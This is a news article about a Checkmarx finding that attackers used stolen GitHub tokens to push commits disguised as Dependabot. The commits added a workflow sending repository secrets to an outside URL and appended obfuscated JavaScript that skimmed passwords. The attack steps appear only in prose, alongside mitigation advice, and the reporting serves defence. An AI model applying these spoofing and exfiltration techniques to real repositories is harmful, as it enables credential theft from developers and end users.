Hundreds of GitHub repositories have been targeted by a threat actor masked as the GitHub platform’s Dependabot feature to install password-stealing malware.
The threat actor targeted website projects on GitHub and was able to threaten the security of an array of end users with a crude manipulation of their identity.
Dependabot is GitHub’s automated dependency-management tool which scans projects for security vulnerabilities and outdated versions, automatically generating pull requests with details of the automatically applied fixes.
Seeing Dependabot contributions in a GitHub project is common and there are a number of ways a genuine commit can be identified.
Dependabot has a unique blue avatar, which is displayed as a square image in commit logs. Human GitHub users’ avatars are displayed as circles. The feature also carries with it a unique ‘Bot’ tag that’s applied next to the ‘dependabot’ alias - a UI feature that a user could not replicate.
The latest attack, investigated by researchers at Checkmarx, showed threat actors mimicking Dependabot by changing the account alias to ‘dependabot[bot]’, along with a blank avatar.
Researchers said this was likely enough to convince most users that a commit had been legitimately made by Dependabot and that it didn’t warrant a second look.
“This is the first incident [in which] we have witnessed a threat actor using fake git commits to disguise activity, knowing that many developers do not check the actual changes of Dependabot when they see it,” researchers said.
According to some of the affected users, GitHub personal access tokens (PATs) were stolen to gain access to projects. PATs offer an alternative method to authenticate access to GitHub without passwords and multi-factor authentication.
After stealing these, the threat actor was able to take over accounts that had access to projects, change their aliases to ‘dependabot[bot]’, and make malicious code commits.
While the idea of forging commits in GitHub isn’t new, researchers said this is the first time they’ve seen Dependabot itself being spoofed in dependency-poisoning attacks.
It’s been known for well over a year that attackers are able to falsify commit dates to make an account appear more active than it actually has been, and spoof the identity of a contributor to poison GitHub projects, but the Dependabot tactic is a new one.
To mitigate any possibility of missing a malicious commit, GitHub introduced Commit Signature Verification which cryptographically signs commits to show they’ve been made by the genuine account holder rather than an attacker that has taken control of their account.
Checkmarx said there are limitations to the feature, in that unverified commits aren’t flagged to project contributors in an overt way. Commits receive a green ‘Verified’ tag next to them, which cannot be forged, but these rely on users being aware of what to look for and checking each one manually, and the user enabling ‘Vigilant Mode’ in their profile.
Researchers said they aren’t certain how the threat actor was able to acquire developers’ PATs, but they believe “the most likely scenario” is one that sees the developer’s computer infected with a malicious open source package that was able to steal the token and exfiltrate it via an attacker-controlled command and control (C2) server.
Once the threat actor was in control of the PATs, commits titled ‘fix’ were made to projects to install the password-stealing malware code.
Analysis showed this part of the attack was likely automated since in most cases researchers observed two common stages of code manipulation on the affected project.
The first saw a new workflow YAML file added to projects called ‘hook.yml’ which sends secrets and variables from the project to a URL - a process that’s re-triggered with every code push.
The second stage saw every single JavaScript file in a project manipulated. Every file with the ‘.js’ extension had an obfuscated line of code appended to the end of it so that once a web browser was launched, a separate script was downloaded from a URL and executed.
Anything inputted to web-based password forms from there on was intercepted and exfiltrated via the same attacker-controlled URL as the one used by the workflow file.
“This whole situation teaches us to be careful about where we get our code, even from trusted places like GitHub,” said Checkmarx. “It shows that even big platforms can have problems, so we need to always watch out and protect ourselves online.
Discover how you can comply with multiple regulations and industry standards
DOWNLOAD FOR FREE
“To make things safer, consider switching to GitHub’s fine-grained personal access tokens. These tokens allow you to reduce the risk of compromised tokens. So, if someone bad gets one of these keys, they can't do a lot of damage.
“The attacker's tactics, techniques, and procedures (TTPs) involve the use of fake commits, stealing user credentials, and impersonating Dependabot to avoid detection, [and] show us supply chain attacks are getting more sophisticated as attackers realize it doesn’t take much to move silently.”
